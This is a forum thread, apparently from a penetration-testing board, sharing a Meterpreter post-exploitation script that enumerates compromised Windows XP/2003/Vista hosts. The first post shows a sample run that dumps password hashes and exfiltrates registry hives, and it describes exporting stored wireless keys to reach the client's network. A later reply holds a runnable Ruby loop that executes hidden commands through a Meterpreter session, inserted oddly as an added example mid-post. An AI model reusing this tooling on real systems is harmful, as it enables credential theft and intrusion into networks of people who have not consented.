Thread: Meterpreter Script for Quick Local Enumeration of Windows Hosts

  1. #1

    Meterpreter Script for Quick Local Enumeration of Windows Hosts

    Hi guys,

    I recently made a small, quick-and-dirty Meterpreter script for enumerating and gathering all the typical information I tend to collect from Windows 2003 and XP hosts after a compromise. Since in most engagements I'm not allowed to install any software on the target hosts, I made it so it only uses Windows native command-line tools.

    Here is a sample of running it. Once a machine is exploited and Meterpreter is deployed, just type run winenum to launch the script:

    Code:
    meterpreter > run winenum 
    [*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
    [*] New session on 10.10.10.7:1249...
    [*] Executing: set
    [*] Executing: arp -a
    [*] Executing: ipconfig /all
    [*] Executing: ipconfig /displaydns
    [*] Executing: route print
    [*] Executing: net view
    [*] Executing: netstat -na
    [*] Executing: netstat -ns
    [*] Executing: net share
    [*] Executing: net view
    [*] Executing: net group
    [*] Executing: net user
    [*] Executing: net localgroup
    [*] Executing: net view /domain
    [*] Executing: netsh firewall show config
    [*] Executing: wmic computersystem list
    [*] Executing: wmic useraccount list
    [*] Executing: wmic group
    [*] Executing: wmic service list brief
    [*] Executing: wmic volume list brief
    [*] Executing: wmic process list brief
    [*] Executing: wmic startup list full
    [*] Executing: wmic qfe
    [*] Downloading WDSRB.txt to -> /tmp/10.10.10.7_20081123.390899982
    [*] Dumping password hashes...
    [*] Exporting HKCU
    [*] Compressing HKCU into cab file for faster download
    [*] Exporting HKLM
    [*] Compressing HKLM into cab file for faster download
    [*] Exporting HKCC
    [*] Compressing HKCC into cab file for faster download
    [*] Exporting HKCR
    [*] Compressing HKCR into cab file for faster download
    [*] Exporting HKU
    [*] Compressing HKU into cab file for faster download
    [*] Downloading HKCU.cab to -> /tmp/10.10.10.7_20081123.390899982-HKCU
    [*] Downloading HKLM.cab to -> /tmp/10.10.10.7_20081123.390899982-HKLM
    [*] Downloading HKCC.cab to -> /tmp/10.10.10.7_20081123.390899982-HKCC
    [*] Downloading HKCR.cab to -> /tmp/10.10.10.7_20081123.390899982-HKCR
    [*] Downloading HKU.cab to -> /tmp/10.10.10.7_20081123.390899982-HKU
    [*] Removing anything we left behind...
    [*] Done!
    
    meterpreter >
    And here is the code; you have to place it in /pentest/exploits/framework3/script/meterpreter/ and name it winenum.rb

    UPDATE:
    Josh Wright from InGuardians published a great paper called Vista Wireless Power Tools on the new features of the Windows Vista wireless commands, and also published several tools. I added the enumeration commands to WinEnum, and it will now also export the registry keys where the configured wireless networks of Windows XP and Windows Vista machines are stored. These files can be imported into the pentester's Windows box to gain access to the client's network, or to get the wireless keys using other tools after importing.

    Let me know if you like it.

  2. #2

    Thanks, I've been looking for an autoscript that can get info about the surrounding network.
    I don't understand Ruby; does that run on the target or on your computer to get that info?

  3. #3

    It runs on your machine, using the Meterpreter API to execute the commands on the host you are connected to. It also uses some of the other API, like the Priv hashdump and the file download API, to pull the files back through the control channel.
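    To make the architecture described in #1 and #3 concrete (the script runs on the attacker's box, the commands run on the compromised host, and only their output comes back over the Meterpreter channel), here is an added example in the same style, written for this page rather than taken from the thread's winenum.rb. The command list is the one from the sample run above, plus the Vista-only netsh wlan commands mentioned in the UPDATE. The MeterpreterSession adapter shows the Rex calls an old-style script would use (assumed from memory of that era's API, not re-verified); FakeSession and its canned output are constructed so the enumeration loop and report writer can be run offline.

```ruby
require 'time'
require 'tmpdir'

# Native XP/2003 commands, as listed in the sample run in #1.
BASE_CMDS = [
  'set', 'arp -a', 'ipconfig /all', 'ipconfig /displaydns', 'route print',
  'net view', 'netstat -na', 'netstat -ns', 'net share', 'net group',
  'net user', 'net localgroup', 'net view /domain',
  'netsh firewall show config', 'wmic computersystem list',
  'wmic useraccount list', 'wmic group', 'wmic service list brief',
  'wmic volume list brief', 'wmic process list brief',
  'wmic startup list full', 'wmic qfe'
].freeze

# Vista-only wireless enumeration; 'netsh wlan' does not exist on XP/2003.
VISTA_WLAN_CMDS = ['netsh wlan show profiles', 'netsh wlan show interfaces'].freeze

# Pick the command list from the OS string the session reports.
def commands_for(os_string)
  cmds = BASE_CMDS.dup
  cmds.concat(VISTA_WLAN_CMDS) if os_string =~ /Vista/i
  cmds
end

# Run every command through the session (real or fake) and collect the
# output keyed by command. Nothing is installed on the target: each entry
# is just a native command executed over the existing channel.
def enumerate(session, os_string)
  commands_for(os_string).each_with_object({}) do |cmd, report|
    report[cmd] = session.execute(cmd)
  end
end

# Write the report to <host>_<timestamp>.txt in dir (mirrors the
# /tmp/10.10.10.7_20081123... naming in the sample run) and return the path.
def write_report(report, host, dir, now = Time.now)
  path = File.join(dir, "#{host}_#{now.strftime('%Y%m%d.%H%M%S')}.txt")
  File.open(path, 'w') do |f|
    report.each { |cmd, out| f.puts("*** #{cmd} ***", out, '') }
  end
  path
end

# Adapter for a real Meterpreter 'client' object: run cmd.exe hidden with a
# channelized stdout and read until the channel closes. Assumed API shape of
# older Metasploit scripts; only usable inside msfconsole, not run here.
class MeterpreterSession
  def initialize(client)
    @client = client
  end

  def execute(cmd)
    proc = @client.sys.process.execute('cmd.exe', "/c #{cmd}",
                                       'Hidden' => true, 'Channelized' => true)
    out = +''
    while (chunk = proc.channel.read)
      out << chunk
    end
    proc.channel.close
    proc.close
    out
  end
end

# Constructed stand-in for a session, so the loop can be exercised offline.
class FakeSession
  CANNED = {
    'ipconfig /all' => "Windows IP Configuration\r\n   Host Name . . . : LAB-XP\r\n",
    'net user' => "User accounts for \\\\LAB-XP\r\nAdministrator  Guest  HelpAssistant\r\n",
    'netsh wlan show profiles' => "Profiles on interface Wireless:\r\n    All User Profile : CorpNet\r\n"
  }.freeze

  attr_reader :log

  def initialize
    @log = []
  end

  def execute(cmd)
    @log << cmd
    CANNED.fetch(cmd, "(no output)\r\n")
  end
end

# Offline demo: enumerate a fake Vista host and print where the report went.
def demo
  session = FakeSession.new
  report = enumerate(session, 'Windows Vista (Build 6000)')
  Dir.mktmpdir { |d| puts "report written to #{write_report(report, '10.10.10.7', d)}" }
  report.size
end
```

    With a real session you would wrap the script's client object as MeterpreterSession.new(client) and pass it to enumerate instead of FakeSession; the hash dump and registry export from the sample run are separate API calls and are not part of this loop.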

  4. #4

    Excellent work.

    Could do with your help in the fake AP thread.

  5. #5

    Nice work.

    Have you a tool to open .cab files in BackTrack?

    Cheers, ozzy

    Oh sorry, I meant .cab .....

  6. #6 hawaii67

    Quote Originally Posted by ozzy66:
        Nice work.

        Have you a tool to open .cap files in BackTrack?

        Cheers, ozzy

    Wireshark? Tcpdump?

  7. #7 Session kill

    I have found this script works extremely well, great job! Just a quick question: is there a command that could be incorporated into the script to kill the active Meterpreter session once it has completed the enumeration? Sometimes that is preferable to backgrounding it. Thanks.

  8. #8

    Just append to the end:

    shell.stop

    That should kill the Meterpreter session.
